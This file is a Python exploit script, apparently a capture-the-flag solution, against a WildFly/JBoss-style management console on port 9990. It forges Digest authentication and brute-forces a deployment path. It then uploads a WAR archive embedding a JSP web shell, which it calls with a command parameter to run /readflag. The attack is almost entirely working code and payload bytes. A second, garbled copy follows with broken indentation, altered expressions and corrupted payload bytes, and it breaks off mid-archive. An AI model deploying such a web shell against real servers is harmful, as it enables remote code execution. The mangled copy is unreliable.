parrot409/wow.py

## wow.py
#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
# print(r.text)

import _socket
import math
import hashlib
import threading
import base64
import time
rotate_amounts = [7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,
                  5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20,
                  4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,
                  6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21]

constants = [int(abs(math.sin(i+1)) * 2**32) & 0xFFFFFFFF for i in range(64)]

init_values = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]

functions = 16*[lambda b, c, d: (b & c) | (~b & d)] + \
            16*[lambda b, c, d: (d & b) | (~d & c)] + \
            16*[lambda b, c, d: b ^ c ^ d] + \
            16*[lambda b, c, d: c ^ (b | ~d)]

index_functions = 16*[lambda i: i] + \
                  16*[lambda i: (5*i + 1)%16] + \
                  16*[lambda i: (3*i + 5)%16] + \
                  16*[lambda i: (7*i)%16]

def left_rotate(x, amount):
    x &= 0xFFFFFFFF
    return ((x<<amount) | (x>>(32-amount))) & 0xFFFFFFFF

def md5(message):
    message = bytearray(message) #copy our input into a mutable buffer
    orig_len_in_bits = (8 * len(message)) & 0xffffffffffffffff
    message.append(0x80)
    while len(message)%64 != 56:
        message.append(0)
    message += orig_len_in_bits.to_bytes(8, byteorder='little')

    hash_pieces = init_values[:]

    for chunk_ofst in range(0, len(message), 64):
        a, b, c, d = hash_pieces
        chunk = message[chunk_ofst:chunk_ofst+64]
        for i in range(64):
            f = functions[i](b, c, d)
            g = index_functions[i](i)
            to_rotate = a + f + constants[i] + int.from_bytes(chunk[4*g:4*g+4], byteorder='little')
            new_b = (b + left_rotate(to_rotate, rotate_amounts[i])) & 0xFFFFFFFF
            a, b, c, d = d, new_b, b, c
        for i, val in enumerate([a, b, c, d]):
            hash_pieces[i] += val
            hash_pieces[i] &= 0xFFFFFFFF

    return sum(x<<(32*i) for i, x in enumerate(hash_pieces))

def md5_to_hex(digest):
    raw = digest.to_bytes(16, byteorder='little')
    return '{:032x}'.format(int.from_bytes(raw, byteorder='big'))

#################################
stat = 'No win'
for i in range(600,1000,4):
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'bwAAAAQADHJ1bnRpbWUtbmFtZXMADGxtYW8xMzM3LndhcgAHY29udGVudG8AAAACAARwYXRocwARL3Byb2Mvc2VsZi9mZC84ODgAB2FyY2hpdmVaAAAJb3BlcmF0aW9ucwADYWRkAAdhZGRyZXNzbAAAAAFwAApkZXBsb3ltZW50cwAMbG1hbzEzMzcud2Fy'
	vv = base64.b64decode(vv)
	vv = vv.replace(b'888',str(i).encode())
	vv = base64.b64encode(vv)
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.close()
	#################################
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management-upload HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:8b9a3a8fac961e2654002c46ef3623cd')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))

	v = b'POST /management-upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytb21P2yhEEYpvqAB\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management-upload", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylEoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayDload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylSoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylgoAad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylhoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayjload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payhload7.zip"; filename="paydload3.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloaad6.zip"; filename="paylofad4.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloxad5.zip"; filename="payloadd1.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="paycload3.zip"; filename="payloadf.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payload.zip"; filename="payload.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="operation"; filename="blob"\r\nContent-Type: application/dmr-encoded\r\n\r\nbwAAAAIACW9wZXJhdGlvbnMABmRlcGxveQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg==\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB--'
	vv = vv.replace(b'DATA',b'PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00META-INF/\xfe\xca\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xf3M\xcc\xcbLK-.\xd1\rK-*\xce\xcc\xcf\xb3R0\xd43\xe0\xe5r.JM,IM\xd1u\xaa\x04\t\x98\xe9\x19\xc4\x1b\x1a(h\x04\x97\xe6)\xf8f&\x17\xe5\x17W\x16\x97\xa4\xe6\x16+x\xe6%\xebi\xf2r\xf1r\x01\x00PK\x07\x08\xa6~]\x16G\x00\x00\x00G\x00\x00\x00PK\x03\x04\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00WEB-INF/PK\x03\x04\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00\x00\x00WEB-INF/web.xml\x85\x8f\xbd\x8e\xc20\x10\x84{?E\xe4>\xde\xfc \x9d\x14\x85P\\\xcbU\xd7\xd0!\xe3,\x90(\xb6\xa3\xac\x89\xf3\xf8\xac\x10\x04:\xba\xd5\xcc7\xda\x99z\xb7\xd8!\x99q\xa2\xce\xbb\xad\xccU&\x93]#\xea\x88\xa7T\x8fc\xc2\xae\xa3\xad\xbc\x860V\x00\xbd\x9e\xb5\xa2\x9bS\xc6[`\x0b\x1cA_ J\xf1\xe0\xaa\x85\xba\x95\x8d1\xaaX*?]\xa0\xc8\xb2\x1c\x0e\x7f\xfb\x7fsE\xab\xd3\xceQ\xd0\xcep\x8a\xf9\x8a\x1e\xe2\xde\x1b\x1d\xb8\xc2\xd7W\xe2\x8b\x0f\xcf\xe6\xc7\xe2\xb8Q\x0b\xb5R\xac\xe3\n\xb5\x91<\x8dp\x9a\x07\x0c\xef+u\xdab\xf3\xeb\xad\xd5\xae\xad\xe1Se\xa8\xa71=w\x036`l\x1b}\xcc\xcb\xf2G\xb1X\xc3\xea\x885\xc4\xe7\xab@#\xeePK\x03\x04\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00\x00\x00cmdwow1337.jsp}\x92]k\xc20\x14\x86\xef\xfb+\xce\x02\x85v\x1b\xf5~k\xcb\xfc\xdatX[\xb4\x0e\xbc\xcc\xecQ3\x9a\xb4K\xd3\xe9\x18\xfb\xefK\x82\xa2\x08\x93@\xceI\xde\'o\xbeN\xe8>AM7\x08\x8c\xd7\x95T\x11\xf9\xa0_4h\x15+\x83\xdb{\x9b\xb3*\xb8%n\xec\x84\xaec\xfaQ\x9eL\xe2\xb0\x97\x0e\x96\xb1\xd3\xaf8\xa7\xa2h`\xc7\xd4\x16^\xe7\x99\x13>\xa7\xb3\x04\x92a>J\x07\x11y\x19\xe6\x04\xa6\xddd\x18\x11\xfe\xbd\xae$\'\xd0\xed\xe7\xe3t\x1a\x11\xa2\xad\xc6\xd3l\x91C\xbe\xcc\xb4\xaep\xaf\x8e\xec\x8a\x17\x97r\xd3\xbes\xa6\x81\xb7\xeed\xa1\x87s\x14\x16\xe9\x98\xedt\xac%\xda\x03\xb25x\x12?[lT\xb0A\x95QI9*\x94\x9e\xf5\xf4\xe1&\x02\xd1\x96\xa5\x0f?N\xd5\xaa\xa0\x96L\xa8Rx\xe4p\x91\x07 p\x07W\x0c\xb4J\xc2\xde,&\xfe\xa3\x93\xc9j\x85M\x035D0k\x85b\x1c\xcd\x92C\xea\xf9\x01\xeequ\xed4\xda#mU\xdd\xaa\xb9\x92H9T\x8dv\xaa\ry>\xedil,N\x14\x13G\xca\xce\x9e\xa0\x01U\xf4\x1c,\x98\xf1\x13\xb8\x83\x0b\xc5cB\xe3:gbc(\t\x91\t\x81\xd6\x8a\t\x13h\xccv[V"xV>\xbe\x1a\\>\x9b\x115\xfb\x8f\xc5\xafn\xae\xf9\xa3Z\xa2\t\xb6d\xc2\x8e\xad\x1f\xe7\x0fPK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00META-INF/\xfe\xca\x00\x00PK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\xa6~]\x16G\x00\x00\x00G\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\n\x00\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc6\x00\x00\x00WEB-INF/PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xec\x00\x00\x00WEB-INF/web.xml\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xdf\x01\x00\x00cmdwow1337.jsp\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\x1dq\x01\x0b\x90\xc9\x01\x00.x\xec\x9e\xcb\xd8\x01\x00.x\xec\x9e\xcb\xd8\x01PK\x05\x06\x00\x00\x00\x00\x05\x00\x05\x00t\x01\x00\x00g\x03\x00\x00\x00\x00')
	# vv = vv.replace(b'DATA',open('/home/hamidreza/pwn/javasass/playground/cmd.war','rb').read())
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.recv(1000)
	s.close()
	#################################
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',8080))
	s.send(b'GET /lmao1337/cmdwow1337.jsp?cmd=/readflag HTTP/1.1\r\nHost: localhost:9990\r\n\r\n')
	g = s.recv(1000)
	stat = 'Noo'
	if(b'Error' not in g):
		stat = g
		break
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'bwAAAAIACW9wZXJhdGlvbnMABnJlbW92ZQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg=='
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.close()
print(stat)
stat
	################################
	#!/usr/bin/env python3
	# import requests_ as requests
	# from requests_.auth import HTTPDigestAuth
	# url = 'http://localhost:9990/management-upload'
	# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
	# print(r.text)

	import _socket
	import math
	import hashlib
	import threading
	import base64
	import time
	rotate_amounts = [7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,
	5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20,
	4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,
	6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21]

	constants = [int(abs(math.sin(i+1)) * 2**32) & 0xFFFFFFFF for i in range(64)]

	init_values = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]

	functions = 16*[lambda b, c, d: (b & c) \| (~b & d)] + \
	16*[lambda b, c, d: (d & b) \| (~d & c)] + \
	16*[lambda b, c, d: b ^ c ^ d] + \
	16*[lambda b, c, d: c ^ (b \| ~d)]

	index_functions = 16*[lambda i: i] + \
	16[lambda i: (5i + 1)%16] + \
	16[lambda i: (3i + 5)%16] + \
	16[lambda i: (7i)%16]

	def left_rotate(x, amount):
	x &= 0xFFFFFFFF
	return ((x<<amount) \| (x>>(32-amount))) & 0xFFFFFFFF

	def md5(message):
	message = bytearray(message) #copy our input into a mutable buffer
	orig_len_in_bits = (8 * len(message)) & 0xffffffffffffffff
	message.append(0x80)
	while len(message)%64 != 56:
	message.append(0)
	message += orig_len_in_bits.to_bytes(8, byteorder='little')

	hash_pieces = init_values[:]

	for chunk_ofst in range(0, len(message), 64):
	a, b, c, d = hash_pieces
	chunk = message[chunk_ofst:chunk_ofst+64]
	for i in range(64):
	f = functions[i](b, c, d)
	g = index_functions[i](i)
	to_rotate = a + f + constants[i] + int.from_bytes(chunk[4g:4g+4], byteorder='little')
	new_b = (b + left_rotate(to_rotate, rotate_amounts[i])) & 0xFFFFFFFF
	a, b, c, d = d, new_b, b, c
	for i, val in enumerate([a, b, c, d]):
	hash_pieces[i] += val
	hash_pieces[i] &= 0xFFFFFFFF

	return sum(x<<(32*i) for i, x in enumerate(hash_pieces))

	def md5_to_hex(digest):
	raw = digest.to_bytes(16, byteorder='little')
	return '{:032x}'.format(int.from_bytes(raw, byteorder='big'))

	#################################
	stat = 'No win'
	for i in range(600,1000,4):
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:3db80d76fa31213a3e0dfb7dc406d705')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	v = b'POST /management HTTP/1.1\r\nContent-Type: application/dmr-encoded\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'bwAAAAQADHJ1bnRpbWUtbmFtZXMADGxtYW8xMzM3LndhcgAHY29udGVudG8AAAACAARwYXRocwARL3Byb2Mvc2VsZi9mZC84ODgAB2FyY2hpdmVaAAAJb3BlcmF0aW9ucwADYWRkAAdhZGRyZXNzbAAAAAFwAApkZXBsb3ltZW50cwAMbG1hbzEzMzcud2Fy'
	vv = base64.b64decode(vv)
	vv = vv.replace(b'888',str(i).encode())
	vv = base64.b64encode(vv)
	v = v.replace(b'1337',str(len(vv)).encode())+vv
	s.send(v)
	s.close()
	#################################
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))
	s.send(b'POST /management-upload HTTP/1.1\r\nContent-Length:0\r\nHost: localhost:9990\r\n\r\n')
	nonce = s.recv(1000)
	nonce = nonce[nonce.index(b'nonce="')+7:]
	nonce = nonce[:nonce.index(b'"')]
	s.close()
	resp = (b'2a0923285184943425d1f53ddd58ec7a:'+nonce+b':00000001:18f6d13842fd9c57:auth:8b9a3a8fac961e2654002c46ef3623cd')
	resp = md5_to_hex(md5(resp))
	s = _socket.socket(_socket.AF_INET,_socket.SOCK_STREAM)
	s.connect(('localhost',9990))

	v = b'POST /management-upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytb21P2yhEEYpvqAB\r\nOrigin: http://localhost:9990\nHost: localhost:9990\r\nContent-Length:1337\r\nAuthorization: Digest username="admin", realm="ManagementRealm", nonce="'+nonce+b'", uri="/management-upload", algorithm=MD5, response="'+resp.encode()+b'", opaque="00000000000000000000000000000000", qop=auth, nc=00000001, cnonce="18f6d13842fd9c57"\r\n\r\n'
	vv = b'------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylEoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayDload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylSoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylgoAad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgaylhoad4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayjload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="pgayload4.zip"; filename="paysload2.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payhload7.zip"; filename="paydload3.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloaad6.zip"; filename="paylofad4.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payloxad5.zip"; filename="payloadd1.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="paycload3.zip"; filename="payloadf.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="payload.zip"; filename="payload.zip"\r\nContent-Type: text/javascript\r\n\r\nDATA\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB\r\nContent-Disposition: form-data; name="operation"; filename="blob"\r\nContent-Type: application/dmr-encoded\r\n\r\nbwAAAAIACW9wZXJhdGlvbnMABmRlcGxveQAHYWRkcmVzc2wAAAABcAAKZGVwbG95bWVudHMADGxtYW8xMzM3Lndhcg==\r\n------WebKitFormBoundarytb21P2yhEEYpvqAB--'
	vv = vv.replace(b'DATA',b'PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00META-INF/\xfe\xca\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xf3M\xcc\xcbLK-.\xd1\rK-\xce\xcc\xcf\xb3R0\xd43\xe0\xe5r.JM,IM\xd1u\xaa\x04\t\x98\xe9\x19\xc4\x1b\x1a(h\x04\x97\xe6)\xf8f&\x17\xe5\x17W\x16\x97\xa4\xe6\x16+x\xe6%\xebi\xf2r\xf1r\x01\x00PK\x07\x08\xa6~]\x16G\x00\x00\x00G\x00\x00\x00PK\x03\x04\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00WEB-INF/PK\x03\x04\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00\x00\x00WEB-INF/web.xml\x85\x8f\xbd\x8e\xc20\x10\x84{?E\xe4>\xde\xfc \x9d\x14\x85P\\\xcbU\xd7\xd0!\xe3,\x90(\xb6\xa3\xac\x89\xf3\xf8\xac\x10\x04:\xba\xd5\xcc7\xda\x99z\xb7\xd8!\x99q\xa2\xce\xbb\xad\xccU&\x93]#\xea\x88\xa7T\x8fc\xc2\xae\xa3\xad\xbc\x860V\x00\xbd\x9e\xb5\xa2\x9bS\xc6[`\x0b\x1cA_ J\xf1\xe0\xaa\x85\xba\x95\x8d1\xaaX?]\xa0\xc8\xb2\x1c\x0e\x7f\xfb\x7fsE\xab\xd3\xceQ\xd0\xcep\x8a\xf9\x8a\x1e\xe2\xde\x1b\x1d\xb8\xc2\xd7W\xe2\x8b\x0f\xcf\xe6\xc7\xe2\xb8Q\x0b\xb5R\xac\xe3\n\xb5\x91<\x8dp\x9a\x07\x0c\xef+u\xdab\xf3\xeb\xad\xd5\xae\xad\xe1Se\xa8\xa71=w\x036`l\x1b}\xcc\xcb\xf2G\xb1X\xc3\xea\x885\xc4\xe7\xab@#\xeePK\x03\x04\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00\x00\x00cmdwow1337.jsp}\x92]k\xc20\x14\x86\xef\xfb+\xce\x02\x85v\x1b\xf5~k\xcb\xfc\xdatX[\xb4\x0e\xbc\xcc\xecQ3\x9a\xb4K\xd3\xe9\x18\xfb\xefK\x82\xa2\x08\x93@\xceI\xde\'o\xbeN\xe8>AM7\x08\x8c\xd7\x95T\x11\xf9\xa0_4h\x15+\x83\xdb{\x9b\xb3\xb8%n\xec\x84\xaec\xfaQ\x9eL\xe2\xb0\x97\x0e\x96\xb1\xd3\xaf8\xa7\xa2h`\xc7\xd4\x16^\xe7\x99\x13>\xa7\xb3\x04\x92a>J\x07\x11y\x19\xe6\x04\xa6\xddd\x18\x11\xfe\xbd\xae$\'\xd0\xed\xe7\xe3t\x1a\x11\xa2\xad\xc6\xd3l\x91C\xbe\xcc\xb4\xaep\xaf\x8e\xec\x8a\x17\x97r\xd3\xbes\xa6\x81\xb7\xeed\xa1\x87s\x14\x16\xe9\x98\xedt\xac%\xda\x03\xb25x\x12?[lT\xb0A\x95QI9\x94\x9e\xf5\xf4\xe1&\x02\xd1\x96\xa5\x0f?N\xd5\xaa\xa0\x96L\xa8Rx\xe4p\x91\x07 p\x07W\x0c\xb4J\xc2\xde,&\xfe\xa3\x93\xc9j\x85M\x035D0k\x85b\x1c\xcd\x92C\xea\xf9\x01\xeequ\xed4\xda#mU\xdd\xaa\xb9\x92H9T\x8dv\xaa\ry>\xedil,N\x14\x13G\xca\xce\x9e\xa0\x01U\xf4\x1c,\x98\xf1\x13\xb8\x83\x0b\xc5cB\xe3:gbc(\t\x91\t\x81\xd6\x8a\t\x13h\xccv[V"xV>\xbe\x1a\\>\x9b\x115\xfb\x8f\xc5\xafn\xae\xf9\xa3Z\xa2\t\xb6d\xc2\x8e\xad\x1f\xe7\x0fPK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00META-INF/\xfe\xca\x00\x00PK\x01\x02\x14\x00\x14\x00\x08\x00\x08\x00\xeebP:\xa6~]\x16G\x00\x00\x00G\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\n\x00\n\x00\x00\x00\x00\x00nbP:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc6\x00\x00\x00WEB-INF/PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00Q\t3U%v\x94\xcf\xc6\x00\x00\x00\\\x01\x00\x00\x0f\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xec\x00\x00\x00WEB-INF/web.xml\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01\x80\xb6\xe9\xe5\x9e\xcb\xd8\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00YbP:\xd2S0,\\\x01\x00\x00w\x02\x00\x00\x0e\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\xdf\x01\x00\x00cmdwow1337.jsp\n\x00 